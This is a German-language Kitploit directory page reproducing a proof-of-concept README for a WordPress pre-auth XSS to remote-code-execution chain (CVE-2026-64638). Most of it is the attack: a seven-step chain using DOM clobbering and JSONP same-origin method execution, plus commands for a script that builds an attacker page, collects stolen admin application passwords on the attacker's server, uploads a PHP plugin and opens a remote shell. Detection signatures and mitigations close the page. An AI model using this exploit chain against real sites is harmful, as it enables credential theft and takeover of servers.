Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
poc-CVE-2026-64638- — PoC-Exploit-Kette für WordPress-Pre-Auth-XSS zu RCE über DOM-Clobbering, REST-JSONP/SOME und Plugin-Upload, mit Docker-Lab-Verifizierung und interaktiver Shell. | Kitploit
Tools/GitHubGitHub/mohwahyudi/poc-cve-2026-64638-
Phishing-ToolsPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsSocial EngineeringRed Teaming
GitHubmohwahyudi/poc-cve-2026-64638-

poc-CVE-2026-64638-

PoC-Exploit-Kette für WordPress-Pre-Auth-XSS zu RCE über DOM-Clobbering, REST-JSONP/SOME und Plugin-Upload, mit Docker-Lab-Verifizierung und interaktiver Shell.

Repository anzeigen
8vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

XSS2Shell — CVE-2026-64638 PoC

WordPress Pre-Auth-XSS → RCE-Exploit-Kette, basierend auf Forschung von pwn.ai, veröffentlicht auf ionsec.io.

⚠️ RECHTLICHER HINWEIS: Nur für BILDUNGSZWECKE und AUTORISIERTE TESTS. Verwenden Sie es nur gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.

Labor-Verifizierung

SchrittTechnikStatus
1Parser-Differential-XSS (sanitize_user + Browser-Parse-Lücke)✅ Verifiziert
2DOM-Clobbering (<area id=ajaxurl>, <div id=color-picker>)✅ Verifiziert
3user-profile.js Auto-Trigger auf der Login-Seite✅ Verifiziert
4REST-JSONP-Callback erlaubt Dot-Traversal (window.opener.approve.click)✅ Verifiziert
5Überschreibung durch _method=GET + _envelope=1✅ Verifiziert
6Diebstahl von Anwendungspasswörtern (SOME)⚠️ Erfordert Admin-Klick
7Plugin-Upload → PHP-Ausführung (ohne Aktivierung)⚠️ Erfordert Anmeldedaten

Siehe lab/VERIFICATION_REPORT.md für vollständige Details.

Zusammenfassung der Schwachstelle

Exploit-Kette (7 Schritte)

root@kitploit:~
Step 1: Parser Differential XSS
  └─ sanitize_user() allows "< area>", "< div>", "< button>" (space after "<")
     Browser parses these as real HTML elements in login error message

Step 2: DOM Clobbering
  └─ <area id=ajaxurl>   → shadows window.ajaxurl (HTMLAreaElement)
     <div id=color-picker class=reset-pass-submit> → satisfies jQuery selectors
     <button class="wp-generate-pw color-option"> → delegated click handler

Step 3: user-profile.js Auto-Trigger
  └─ Enqueued on wp-login.php (line 1398)
     $('.reset-pass-submit button.wp-generate-pw').trigger('click') fires
     $.post(ajaxurl, ...) → target URL = area.href (attacker-controlled)

Step 4: REST API JSONP + SOME
  └─ _jsonp=window.opener.approve.click → Same Origin Method Execution
     _envelope=1 → bypass auth error, wrap response in 200
     wp_check_jsonp_callback: regex /[^\w\.]/ allows dot traversal

Step 5: Social Engineering (1 click)
  └─ Admin sees real /wp-admin/authorize-application.php page
     Clicks "Approve" → application password minted

Step 6: Credential Theft
  └─ Password appears in redirect query string → read by child window (same-origin)

Step 7: Plugin Upload → RCE
  └─ Upload plugin ZIP → extracted to /wp-content/plugins/{slug}/
     PHP files directly executable WITHOUT activation

Schnellstart

1. Abhängigkeiten installieren

root@kitploit:~
pip install requests

2. Ziel erkunden (Recon)

root@kitploit:~
python3 xss2shell_poc.py --target https://wp-target.com --check

# Mit Burp-Suite-Proxy
python3 xss2shell_poc.py --target https://wp-target.com --check --proxy http://127.0.0.1:8081

3. Docker-Lab (zum Testen)

root@kitploit:~
cd lab
docker-compose up -d
# WordPress 6.0.3 at http://localhost:8080
# Admin: admin / password123

4. XSS-Vektor gegen das Lab verifizieren

root@kitploit:~
python3 xss2shell_poc.py --target http://localhost:8080 --check --no-ssl

5. Angreiferseite generieren

root@kitploit:~
python3 xss2shell_poc.py --target https://wp-target.com \
    --attacker-host https://your-server.com --generate-page

Laden Sie xss2shell_attacker.html und collect.php auf Ihren Server hoch.

6. Link an den Admin senden

Ein angemeldeter WordPress-Admin muss die Angreiferseite besuchen und einmal klicken.

7. Anmeldedaten empfangen

Die Anmeldedaten erscheinen in collected_creds.json auf Ihrem Server:

root@kitploit:~
[
  {
    "timestamp": "2026-08-08T...",
    "username": "admin",
    "password": "AbCd 1234 EfGh 5678",
    "site": "https://wp-target.com"
  }
]

8. RCE-Kette ausführen

root@kitploit:~
python3 xss2shell_poc.py --target https://wp-target.com \
    --username admin --app-password "AbCd 1234 EfGh 5678" --rce

9. Interaktive Shell

root@kitploit:~
python3 xss2shell_poc.py --target https://wp-target.com \
    --username admin --app-password "AbCd 1234 EfGh 5678" --shell

10. Bereinigung

root@kitploit:~
python3 xss2shell_poc.py --target https://wp-target.com \
    --username admin --app-password "AbCd 1234 EfGh 5678" --cleanup

Erkennung (Log-Forensik)

Signaturen, nach denen Sie in Server-Logs suchen sollten:

  • Access-Log: POST /wp-login.php mit Body, der < area, < div, < button enthält
  • Access-Log: REST-Anfrage mit Query-Parameter _jsonp= (insbesondere _jsonp=a.b.c — der Punkt ist das SOME-Indiz)
  • Access-Log: _envelope=1 + _method=GET auf Routen, die diese ablehnen sollten
  • Access-Log: POST /wp-admin/update.php?action=upload-plugin von nicht erkannter IP
  • Access-Log: GET /wp-content/plugins/{unknown-plugin}/*.php — PHP-Datei in einem nie aktivierten Plugin
  • App-Log: Anwendungspasswort wurde innerhalb von Sekunden nach einer Anfrage an authorize-application.php erstellt

Gegenmaßnahmen

  1. Patchen Sie auf WordPress 7.0.3 (oder das neueste Point-Release für Ihren Zweig)
  2. Rotieren Sie alle Anwendungspasswörter von Administratoren
  3. Deaktivieren Sie Anwendungspasswörter, falls nicht benötigt:
    root@kitploit:~
    add_filter('wp_is_application_passwords_available', '__return_false');
    
  4. Deaktivieren Sie REST-JSONP:
    root@kitploit:~
    add_filter('rest_jsonp_enabled', '__return_false');
    
  5. Deaktivieren Sie Dateiänderungen:
    root@kitploit:~
    define('DISALLOW_FILE_MODS', true);
    
  6. WAF-Regeln: Blockieren Sie _jsonp= und _envelope= an REST-Endpunkten; blockieren Sie < area im POST-Body an wp-login.php

Dateistruktur

root@kitploit:~
xss2shell/
├── README.md                      # Documentation (this file)
├── xss2shell_poc.py               # Main PoC script
├── xss2shell_attacker.html        # Generated attacker page
├── collect.php                    # Credential collector endpoint
└── lab/
    ├── docker-compose.yml         # Docker lab (WP 6.0.3)
    ├── VERIFICATION_REPORT.md     # Step-by-step verification
    ├── test_sanitize.php          # sanitize_user() tests
    ├── test_full_payload.php      # Full payload chain test
    ├── test_browser.html          # DOM clobbering browser test
    ├── test_end_to_end.php        # End-to-end PHP test
    └── verify_xss.sh              # Automated curl tests

Referenzen

  • IonSec — XSS2Shell: WordPress Pre-Auth XSS to RCE
  • pwn.ai — Originalentdeckung
  • WordPress-Sicherheitsveröffentlichungen
Tool herunterladen
ElementDetail
CVECVE-2026-64638
CVSS 4.08.9
BetroffenWordPress 4.7 – 7.0.2 (nicht gepatchte Point-Releases)
BehobenWordPress 7.0.3 (6. August 2026), zurückportiert auf alle Wartungszweige
AuthentifizierungPre-Auth (nicht authentifiziertes XSS)
AuswirkungRCE per Plugin-Upload